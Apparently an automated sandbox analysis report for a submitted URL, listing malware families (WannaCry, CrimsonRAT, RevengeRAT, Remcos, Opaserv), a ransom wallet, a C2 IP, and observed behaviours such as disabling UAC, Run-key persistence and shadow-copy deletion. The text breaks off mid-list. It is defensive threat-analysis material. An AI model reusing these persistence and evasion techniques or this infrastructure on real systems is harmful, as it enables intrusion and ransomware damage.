Analysis
-
max time kernel
700s -
max time network
736s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-10-2024 15:41
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://bloxflip.com/a/kriszti
Resource
win10v2004-20240802-en
General
-
Target
https://bloxflip.com/a/kriszti
Malware Config
Extracted
C:\Users\Admin\Desktop\WannaCry-main\WannaCry-main\@[email protected]
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Extracted
crimsonrat
185.136.161.124
Signatures
-
CrimsonRAT main payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0008000000023351-5304.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3576 5740 rundll32.exe 260 -
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Processes:
reg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
RevengeRat Executable 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0008000000000705-6879.dat revengerat -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid Process 431 3576 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AnyDesk.exeAnyDesk.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation AnyDesk.exe Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation AnyDesk.exe -
Drops startup file 2 IoCs
Processes:
WannaCry.EXEdescription ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7BCD.tmp WannaCry.EXE File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7BD4.tmp WannaCry.EXE -
Executes dropped EXE 35 IoCs
Processes:
AnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exetaskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exeUserdata.exedlrarhsiva.exepid Process 1476 AnyDesk.exe 1832 AnyDesk.exe 4548 AnyDesk.exe 1592 AnyDesk.exe 220 AnyDesk.exe 4772 taskdl.exe 5340 @[email protected] 3828 @[email protected] 4084 taskhsvc.exe 4732 taskdl.exe 4512 taskse.exe 1244 @[email protected] 3280 taskdl.exe 5328 taskse.exe 3244 @[email protected] 6128 taskse.exe 3736 @[email protected] 212 taskdl.exe 992 taskse.exe 2708 @[email protected] 4020 taskdl.exe 5912 taskse.exe 772 @[email protected] 4512 taskdl.exe 5936 taskse.exe 2768 @[email protected] 1892 taskdl.exe 5204 taskse.exe 3908 @[email protected] 3576 taskdl.exe 5300 taskse.exe 5932 @[email protected] 5292 taskdl.exe 1408 Userdata.exe 940 dlrarhsiva.exe -
Loads dropped DLL 9 IoCs
Processes:
AnyDesk.exeAnyDesk.exetaskhsvc.exepid Process 1592 AnyDesk.exe 4548 AnyDesk.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs
UAC Bypass Attempt via SilentCleanup Task.
-
Adds Run key to start application 2 TTPs 17 IoCs
Processes:
Remcos.exeOpaserv.l.exereg.exeOpaserv.l.exeUserdata.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\"" Remcos.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsrv = "c:\\windows\\system\\winsrv.exe" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\LoadManager = "c:\\windows\\system\\msload.exe" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\oefimrcpcbg941 = "\"C:\\Users\\Admin\\Desktop\\WannaCry-main\\WannaCry-main\\tasksche.exe\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CRTDLL = "C:\\WINDOWS\\CRTDLL.EXE" Opaserv.l.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CRYPTDLL = "C:\\WINDOWS\\CRYPTDLL.EXE" Opaserv.l.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winsrv = "c:\\windows\\system\\winsrv.exe" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\scr = "c:\\windows\\system\\scr.scr" Opaserv.l.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\"" Userdata.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\COLORUI = "C:\\WINDOWS\\COLORUI.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\scr = "c:\\windows\\system\\scr.scr" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\LoadManager = "c:\\windows\\system\\msload.exe" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\DDOIPROXY = "C:\\WINDOWS\\DDOIPROXY.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MPREXE = "C:\\WINDOWS\\MPREXE.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunServices\DDORES = "C:\\WINDOWS\\DDORES.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CMUTIL = "C:\\WINDOWS\\CMUTIL.EXE" Opaserv.l.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MPREXE = "C:\\WINDOWS\\MPREXE.EXE" Opaserv.l.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
Processes:
flow ioc 337 camo.githubusercontent.com 338 camo.githubusercontent.com 415 0.tcp.ngrok.io 463 drive.google.com 464 drive.google.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 60 api.ipify.org 64 api.ipify.org -
Drops file in System32 directory 20 IoCs
Processes:
AnyDesk.exeRemcos.exeiexplore.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\Userdata\Userdata.exe Remcos.exe File created C:\Windows\SysWOW64\remcos\logs.dat iexplore.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\Userdata Remcos.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db AnyDesk.exe File created C:\Windows\SysWOW64\Userdata\Userdata.exe Remcos.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db AnyDesk.exe File opened for modification C:\Windows\SysWOW64\remcos\logs.dat iexplore.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
WannaCry.EXE@[email protected]description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" WannaCry.EXE Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Suspicious use of SetThreadContext 3 IoCs
Processes:
RevengeRAT.exeRegSvcs.exeUserdata.exedescription pid Process procid_target PID 5524 set thread context of 5964 5524 RevengeRAT.exe 235 PID 5964 set thread context of 5544 5964 RegSvcs.exe 236 PID 1408 set thread context of 5320 1408 Userdata.exe 251 -
Processes:
resource yara_rule behavioral1/memory/7044-6373-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/7044-6890-0x0000000000400000-0x0000000000438000-memory.dmp upx -
Drops file in Windows directory 26 IoCs
Processes:
Opaserv.l.exeOpaserv.l.exedescription ioc Process File opened for modification \??\c:\windows\system\msload.exe Opaserv.l.exe File opened for modification C:\WINDOWS\COLORUI.EXE Opaserv.l.exe File created C:\WINDOWS\DDORES.EXE Opaserv.l.exe File opened for modification \??\c:\windows\system\msload.exe Opaserv.l.exe File opened for modification \??\c:\windows\system\scr.scr Opaserv.l.exe File opened for modification \??\c:\windows\MPREXE.EXE Opaserv.l.exe File created \??\c:\windows\system\msload.exe Opaserv.l.exe File opened for modification C:\WINDOWS\DDOIPROXY.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\DDORES.EXE Opaserv.l.exe File opened for modification \??\c:\windows\system\winsrv.exe Opaserv.l.exe File opened for modification \??\c:\windows\system\scr.scr Opaserv.l.exe File created \??\c:\windows\system\scr.scr Opaserv.l.exe File opened for modification \??\c:\windows\MPREXE.EXE Opaserv.l.exe File created C:\WINDOWS\CMUTIL.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\MPREXE.EXE Opaserv.l.exe File created \??\c:\windows\system\winsrv.exe Opaserv.l.exe File opened for modification C:\WINDOWS\CMUTIL.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\MPREXE.EXE Opaserv.l.exe File opened for modification \??\c:\windows\system\winsrv.exe Opaserv.l.exe File created C:\WINDOWS\COLORUI.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\CRTDLL.EXE Opaserv.l.exe File created C:\WINDOWS\CRTDLL.EXE Opaserv.l.exe File created C:\WINDOWS\MPREXE.EXE Opaserv.l.exe File created C:\WINDOWS\CRYPTDLL.EXE Opaserv.l.exe File created C:\WINDOWS\DDOIPROXY.EXE Opaserv.l.exe File opened for modification C:\WINDOWS\CRYPTDLL.EXE Opaserv.l.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
taskse.exeUserdata.exereg.execmd.exetaskse.exetaskse.exetaskdl.exetaskse.exe@[email protected]@[email protected]@[email protected]taskdl.exeAnyDesk.exeAnyDesk.exeattrib.exetaskhsvc.exetaskdl.exe@[email protected]net1.exetaskse.exetaskse.execmd.exe@[email protected]NET.exeWMIC.exetaskdl.exeOpaserv.l.exeNET.exeattrib.execscript.exeiexplore.exenet1.exeNET.exeRegSvcs.exe@[email protected]reg.exeNetWire.exeicacls.exetaskse.execmd.exenet1.exenet1.exe@[email protected]@[email protected]taskdl.exeNET.exeNET.exeNET.exeAnyDesk.execmd.exeNET.exeNET.exeRemcos.execmd.exeAnyDesk.exeAnyDesk.exeWannaCry.EXEcmd.execmd.exeOpaserv.l.exetaskdl.exetaskse.exeRegSvcs.exereg.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Userdata.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhsvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opaserv.l.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NetWire.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Remcos.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnyDesk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WannaCry.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opaserv.l.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AnyDesk.exeWINWORD.EXEWINWORD.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AnyDesk.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AnyDesk.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
WINWORD.EXEmsedge.exeWINWORD.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 7272 taskkill.exe -
Modifies registry key 1 TTPs 7 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exepid Process 5164 reg.exe 3240 reg.exe 2512 reg.exe 3244 reg.exe 692 reg.exe 6728 reg.exe 7620 reg.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 241313.crdownload:SmartScreen msedge.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 7472 schtasks.exe 7232 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
Processes:
AnyDesk.exeWINWORD.EXEWINWORD.EXEpid Process 1592 AnyDesk.exe 1936 WINWORD.EXE 1936 WINWORD.EXE 5740 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exeAnyDesk.exemsedge.exemsedge.exetaskhsvc.exemsedge.exemsedge.exemsedge.exeOpaserv.l.exepid Process 3196 msedge.exe 3196 msedge.exe 3060 msedge.exe 3060 msedge.exe 3224 identity_helper.exe 3224 identity_helper.exe 5476 msedge.exe 5476 msedge.exe 4548 AnyDesk.exe 4548 AnyDesk.exe 4548 AnyDesk.exe 4548 AnyDesk.exe 5328 msedge.exe 5328 msedge.exe 5328 msedge.exe 5328 msedge.exe 2676 msedge.exe 2676 msedge.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 4084 taskhsvc.exe 5272 msedge.exe 5272 msedge.exe 460 msedge.exe 460 msedge.exe 3596 msedge.exe 3596 msedge.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe 7952 Opaserv.l.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AnyDesk.exepid Process 220 AnyDesk.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 49 IoCs
Processes:
msedge.exepid Process 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe 3060 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
AUDIODG.EXEAnyDesk.exeWMIC.exevssvc.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exeRevengeRAT.exeRegSvcs.exedescription pid Process Token: 33 5668 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5668 AUDIODG.EXE Token: SeDebugPrivilege 4548 AnyDesk.exe Token: SeIncreaseQuotaPrivilege 5616 WMIC.exe Token: SeSecurityPrivilege 5616 WMIC.exe Token: SeTakeOwnershipPrivilege 5616 WMIC.exe Token: SeLoadDriverPrivilege 5616 WMIC.exe Token: SeSystemProfilePrivilege 5616 WMIC.exe Token: SeSystemtimePrivilege 5616 WMIC.exe Token: SeProfSingleProcessPrivilege 5616 WMIC.exe Token: SeIncBasePriorityPrivilege 5616 WMIC.exe Token: SeCreatePagefilePrivilege 5616 WMIC.exe Token: SeBackupPrivilege 5616 WMIC.exe Token: SeRestorePrivilege 5616 WMIC.exe Token: SeShutdownPrivilege 5616 WMIC.exe Token: SeDebugPrivilege 5616 WMIC.exe Token: SeSystemEnvironmentPrivilege 5616 WMIC.exe Token: SeRemoteShutdownPrivilege 5616 WMIC.exe Token: SeUndockPrivilege 5616 WMIC.exe Token: SeManageVolumePrivilege 5616 WMIC.exe Token: 33 5616 WMIC.exe Token: 34 5616 WMIC.exe Token: 35 5616 WMIC.exe Token: 36 5616 WMIC.exe Token: SeIncreaseQuotaPrivilege 5616 WMIC.exe Token: SeSecurityPrivilege 5616 WMIC.exe Token: SeTakeOwnershipPrivilege 5616 WMIC.exe Token: SeLoadDriverPrivilege 5616 WMIC.exe Token: SeSystemProfilePrivilege 5616 WMIC.exe Token: SeSystemtimePrivilege 5616 WMIC.exe Token: SeProfSingleProcessPrivilege 5616 WMIC.exe Token: SeIncBasePriorityPrivilege 5616 WMIC.exe Token: SeCreatePagefilePrivilege 5616 WMIC.exe Token: SeBackupPrivilege 5616 WMIC.exe Token: SeRestorePrivilege 5616 WMIC.exe Token: SeShutdownPrivilege 5616 WMIC.exe Token: SeDebugPrivilege 5616 WMIC.exe Token: SeSystemEnvironmentPrivilege 5616 WMIC.exe Token: SeRemoteShutdownPrivilege 5616 WMIC.exe Token: SeUndockPrivilege 5616 WMIC.exe Token: SeManageVolumePrivilege 5616 WMIC.exe Token: 33 5616 WMIC.exe Token: 34 5616 WMIC.exe Token: 35 5616 WMIC.exe Token: 36 